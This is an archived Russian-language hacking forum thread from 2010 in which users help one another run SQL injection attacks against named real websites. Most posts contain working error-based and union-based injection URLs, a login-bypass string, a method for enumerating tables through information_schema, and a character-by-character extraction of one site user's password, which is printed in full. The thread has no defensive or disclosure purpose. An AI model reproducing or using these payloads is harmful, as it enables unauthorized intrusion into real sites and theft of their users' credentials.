ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.09.2010, 22:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
1
Код:
Code:
http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat%28%28SeLEcT+concat_ws%280x3a,id,password,login%29%20from%20a_admins%20limit%200,1%29,rAnD%280%29|0%29+hAvInG+miN%280%29%20*/
http://www.xvideo.ru/admin/login.php?action=send
там такое:
Сообщение от None
064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''asdasd'' and banned = 0' at line 1
select id, password from a_admins where login = 'asdasd'
' and banned = 0
если подмутить типо такого в логин, то должно пустить поидеи:
Сообщение от None
' or 1=1 limit 0,1[комент|продлить]
зы итак крутить через ошибку можно
|
|
|
09.09.2010, 23:46
|
|
Новичок
Регистрация: 30.03.2010
Сообщений: 2
Провел на форуме:
21162
Репутация:
0
|
|
может кто-нибудь помочь мне с этим?
http://www.menupix.com/hoboken/restaurants.php?id=305209
Я не могу извлечь базу данных
|
|
|
|
09.09.2010, 23:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от gabarea
gabarea said:
может кто-нибудь помочь мне с этим?
http://www.menupix.com/hoboken/restaurants.php?id=305209
Я не могу извлечь базу данных
Код:
Code:
http://www.menupix.com/hoboken/restaurants.php?id=305209%20and%20%20%28/**/select%20count%28*%29%20from%20%28/**/select%201%20union%20/**/select%202/**/union/**/select%203%29x%20group%20by%20concat%28database%28%29,floor%28rand%280%29*2%29%29%29
Сообщение от None
Duplicate entry 'mxst1k_mxdb1' for key 1
|
|
|
|
10.09.2010, 00:15
|
|
Новичок
Регистрация: 30.03.2010
Сообщений: 2
Провел на форуме:
21162
Репутация:
0
|
|
что это значит? Я не могу извлечь данные?
|
|
|
|
10.09.2010, 00:22
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379
Репутация:
0
|
|
gabarea:
information_schema.tables фильтруется, поэтому делаем так:
Сообщение от None
http://www.menupix.com/hoboken/restaurants.php?id=305209+or+1+group+by+concat((SE LECT+count(*)+from+information_schema.columns),ran d(0)|0)+having+min(0)
"Duplicate entry '6471' for key 1" - 647 колонок. Далее прогоняй вот так:
Сообщение от None
http://www.menupix.com/hoboken/restaurants.php?id=305209+or+1+group+by+concat((SE LECT+concat_ws(0x3a,table_name,column_name)+from+i nformation_schema.columns+limit+0,1),rand(0)|0)+ha ving+min(0)
меняя "limit+0,1" - "limit+647,1". Так сможешь вывести все имена колонок и таблиц, в которых они находятся.
Дальше, надеюсь, сам разберешься.
|
|
|
|
11.09.2010, 21:09
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
кстати, сегодня пытаюсь зайти туда и .. ВУАЛЯ ! сайт лежит. (или ведется тех.работы)
и каким то чудом информация доступна о софте:
в служебном инфе есть линк на __http://drupal.org/node/258
отсюда можно делать вывод, что это Drupal движек.. хотя я думал самописный.
а внизу мелким штифтом:
The mysql error was: Too many connections.
а тут и тип БД.
P.S. DDoS или что.. ?
теперь все это дело надо как небудь совместить..
если там mod_rewrite, то смогу что то ковырять в БД ? или это бесполезно?
|
|
|
|
11.09.2010, 21:55
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от B1t.exe
B1t.exe said:
кстати, сегодня пытаюсь зайти туда и .. ВУАЛЯ ! сайт лежит. (или ведется тех.работы)
и каким то чудом информация доступна о софте:
в служебном инфе есть линк на __http://drupal.org/node/258
отсюда можно делать вывод, что это Drupal движек.. хотя я думал самописный.
а внизу мелким штифтом:
The mysql error was: Too many connections.
а тут и тип БД.
P.S. DDoS или что.. ?
теперь все это дело надо как небудь совместить..
если там
mod_rewrite
, то смогу что то ковырять в БД ? или это бесполезно?
Если тебе известен двиг, скачай исходники и посмотри структуру запросов.
|
|
|
|
12.09.2010, 01:07
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
ну это логично и я понимаю насчет уязвимостей, но там насчет запросов SQL получиться, если ничего не отображаеться на адресном сторке?
mod_rewrite
|
|
|
|
12.09.2010, 11:45
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
такая проблема:
http://www.soulmades.com/index.php?method=pubchatform&roomid=1%20union%20se lect%201,id,password,4,5%20from%20soul_souluser%20 where+id=1101181/*
вывод идет сюда:
Код:
Code:
Private chat between lily_michelle and
1101181 - id
lily_michelle - name
539818 - password
вывод возможен только числовых значений
непонятки с паролем, то ли он выводится неполным, то ли еще что-то. давайте вместе помозгуем. |
|
|
|
12.09.2010, 14:07
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,length(password),4,5 from soul_souluser where+id=1101181/*
=>
длина пароля 16
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,1,6),4,5 from soul_souluser where+id=1101181/*
=>
первые 6 символов '539818'
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,ascii(mid(password,7,1)),4,5 from soul_souluser where+id=1101181/*
=>
ascii код 7-го символа 99 => 'c'
дальше можно самостоятельно
... добалено позже ...
не, решил дальше поизвращаться
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,8,1))-100*ascii(mid(password,9,1))-100*100*ascii(mid(password,10,1))),4,5 from soul_souluser where+id=1101181/*
=>
ascii коды 10,9,8 символа = 544955 => '716'
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,8),4,5 from soul_souluser where+id=1101181/*
=>
8-13 символы = '716512'
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,14,1))-1000*ascii(mid(password,15,1))-1000*1000*ascii(mid(password,16,1))),4,5 from soul_souluser where+id=1101181/*
=>
ascii коды 16,15,14 символа = 57049102 => 'f19'
password = '539818c716512f19'
проверяем
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,if(password='539818c716512f19',1,8),4,5 from soul_souluser where+id=1101181/*
=>
1, т.е. пароль верный
кста, вариант с if(password=0x35333938313863373136353132663139,1,8 ) почему-то не прокатил. кто знает почему такое может быть ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Комбинированный вид